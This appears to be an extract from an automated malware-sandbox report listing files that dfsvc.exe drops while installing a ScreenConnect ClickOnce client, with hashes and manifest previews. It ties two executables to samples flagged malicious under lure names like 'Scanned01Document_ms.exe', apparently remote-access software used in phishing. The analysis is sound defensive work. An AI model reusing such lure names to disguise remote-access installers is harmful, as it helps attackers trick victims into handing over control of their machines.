                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):412
                                                                                                                                                                                                Entropy (8bit):3.9719419467755217
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKZdUZbz1uz8p4yfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:xWzmJymxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                MD5:0D62B5A19BCF1353A50B9C8CA9994B6A
                                                                                                                                                                                                SHA1:BC1DA3F8F2A46963AEE94CEE7E8C202D4A94E32F
                                                                                                                                                                                                SHA-256:7178782FCF3B93E63A15CA5A75B859B52A06E7FDD022F4C2C83EF6874BF322CC
                                                                                                                                                                                                SHA-512:7C183754531B3D274181EFC327715ED80FFECED0FE248B58AEB65EF0D4592BE614D178E421B1456A92F6C802842559471CF42A9C5F41204C2A1E1D5B45F61AB5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ....(......\.1..(.................a.{0....F..5....................F..5.. ........w..11.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                Entropy (8bit):3.0450248512231974
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kK1U1LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:NU1LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                MD5:53DF55DEEF48965C0A20CF48AADED84F
                                                                                                                                                                                                SHA1:E982C24D0BB604EEDDE284325B95BF3CCFEA2A29
                                                                                                                                                                                                SHA-256:76109E36CC8824B02D9EFD81D0548AF37849AE7E4946A2217EE043633E064225
                                                                                                                                                                                                SHA-512:0871C3D32821BEB6C569807589BC81ED9AF5DB4981952319158582BB9B15AF5338381EC50B357360B646318EE2E4B8A3CEBF7778B3AD9D8CFC3B545240D42D83
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ....l...Z2..1..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):25496
                                                                                                                                                                                                Entropy (8bit):5.0630161555157365
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ilqh0BGo26tX9DkX9R/QPIBM7YV+++amtK/:isOD26tX9DkX9R/QPI+0V+++amtg
                                                                                                                                                                                                MD5:C133495EC09409322A4D6BEA63AC4E28
                                                                                                                                                                                                SHA1:EB1996090261CF8C03EDE329905F558FA5B91B7C
                                                                                                                                                                                                SHA-256:2552128168028EDEF6ED1D6095BA110E8A7174BD37B455BE90C173A0C3C3C73A
                                                                                                                                                                                                SHA-512:B870F883CA908C687CE00797280682E7D44F04E89C06EE1C9CCDB0824B4F5B3B1C6AA730B9A37DD88607833F943F0884C6995DDA5F283C09E28C3D57867F58C9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3452
                                                                                                                                                                                                Entropy (8bit):4.485839718784607
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:AfJ3uWWWeV+WwQXlmL4Mco7rwQQNLokgSKhIYX:k3yJUUMco3QxgLf
                                                                                                                                                                                                MD5:9BFA752E711DE8F1CDEED9F2FAC23AD2
                                                                                                                                                                                                SHA1:DEAF928E71ED962C4E9F4AC91F0B9AC283E5E907
                                                                                                                                                                                                SHA-256:54FC2412F19D2D3B14D60AA7656E7BF13852DF681C1C23A03B3D56C51DF7BE00
                                                                                                                                                                                                SHA-512:3C7233478E804677E93F67BDFC91644CD0F34C45483A83A4687DFE51F2475AC734056E146FAD2FBEC0CD07331F0CAC52379F8F732450EF98CE3127EEDA3AA12A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PcmH.........q......#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................'...............................................'...............................................'...............................................'...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                Entropy (8bit):4.866633492547934
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:7Nq6R84zeV+Ww7mkVyuokZR+PtYAaUeiBdVfNOSnwnjIbm:/R840JCVbPZR+VHaodXCjd
                                                                                                                                                                                                MD5:99DEA98517A9C532BC5723877FB45B58
                                                                                                                                                                                                SHA1:27810040D57557B4163188933E667D7F31CCFDD5
                                                                                                                                                                                                SHA-256:6BC2A0837BBB6B84E1E158C1D207F0C9DE324C58FDAACA305CDBD71344A0322F
                                                                                                                                                                                                SHA-512:468DA0677458347A8A92559934F2113C7C7E0381D3FA2F2E0CCD89F39A8F5D225F8E1600236552C20F19434E1CE4C8FB72F788F5C06F77DBB9602DE59804014A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6588
                                                                                                                                                                                                Entropy (8bit):3.9950372668229455
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:6MmxveV+WwwU8WpjHowxlaLpuy+40Hq5UwD6ksJqi/D5:Wx4JwpjTL+3+40H4zZw75
                                                                                                                                                                                                MD5:77EBB11984CE5F59780E556871BF16F2
                                                                                                                                                                                                SHA1:333C1E0892E7B603B657BBBD3B561CEF62478583
                                                                                                                                                                                                SHA-256:CA4C4AB14AF88FD8BF370F70774D3C7B74C8EDE63FE9D8E80946451BABA4D075
                                                                                                                                                                                                SHA-512:8B54F5680AD13B61E4016D520D57436552E5633EA4AA84D290B76CC79DC2870F85103D08891FE2B4D08E398377226BEBBDD4BF7414E95517E95992362FFC94C0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3032
                                                                                                                                                                                                Entropy (8bit):4.873813172917691
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:2MQScjgye6S+9oww7g47Jw+f7iI++5dFkEM6VbjftLjnwbb:2XScheV+WwwnJwOiMRkbortLjnEb
                                                                                                                                                                                                MD5:099A7A25A9CCBB2DF9AB39ACFD4C8561
                                                                                                                                                                                                SHA1:F258B670488C71EE7B196F23E1E52218FAAA2176
                                                                                                                                                                                                SHA-256:23BCD9D2D07BC800606E75CC23B2630040EDE524940E7D2BBAE0635B11D156D5
                                                                                                                                                                                                SHA-512:A9AA4E75D4A7E9FC60ADB8CB2F5D3F370B06FF72A54641114667B919A873B699C1E1F97F3C3DF93B9CFF4F79F46C826B52CFEFDB54814D0A141528CFBA4C8A2D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):14612
                                                                                                                                                                                                Entropy (8bit):5.714603865129983
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:/TWh4+An9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:/TWY9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                MD5:84C34D082FFFFE4A2E181946682A9B1C
                                                                                                                                                                                                SHA1:5033E1B0B944D87E4308E3B6D23DD204DCB788BA
                                                                                                                                                                                                SHA-256:259D9FA007F0D3ED64D71A05AE28E3626EF49260A2DF1D56FBFF33DE2B395264
                                                                                                                                                                                                SHA-512:36C23D3B7ED7829A2850BDC8C4EAC765670450A2E20D9DC98D5641A837F121CC899558D8461E4302303C85EBBE66051AFDDAE1E44DA4D93B23071AC18F05C9FB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):147976
                                                                                                                                                                                                Entropy (8bit):5.699150757460175
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                                                MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                                                SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                                                SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                                                SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4428
                                                                                                                                                                                                Entropy (8bit):4.222375296253386
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:7GvXQeV+Ww8U45uXWOH5VEQ5WVXkoNOrf:7qPJjuX/xPoq
                                                                                                                                                                                                MD5:7CEE72E3F9C2B40E60408B50C1C61AEC
                                                                                                                                                                                                SHA1:D56A041D8DFE63BE897A056DDE273126118934F7
                                                                                                                                                                                                SHA-256:6DD9D20C15EFD95CC33CA5ACCE3D84C3C433E890EAFB55A1B6D903A8D17861CD
                                                                                                                                                                                                SHA-512:AE4B2812506EEED6C12A05C95609E0BD3785C30280256C2DB3AFF5998A1015F678B50D6C10330B0C29C584BEC748A39052DD75D6973E0EBA2BA3F0E857EF53D6
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: statments.exe, Detection: malicious
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious
                                                                                                                                                                                                • Filename: sstatment.exe, Detection: malicious
                                                                                                                                                                                                • Filename: extukGiBrn.exe, Detection: malicious
                                                                                                                                                                                                • Filename: Vh0tTzx4Ko.exe, Detection: malicious
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: extukGiBrn.exe, Detection: malicious, Browse
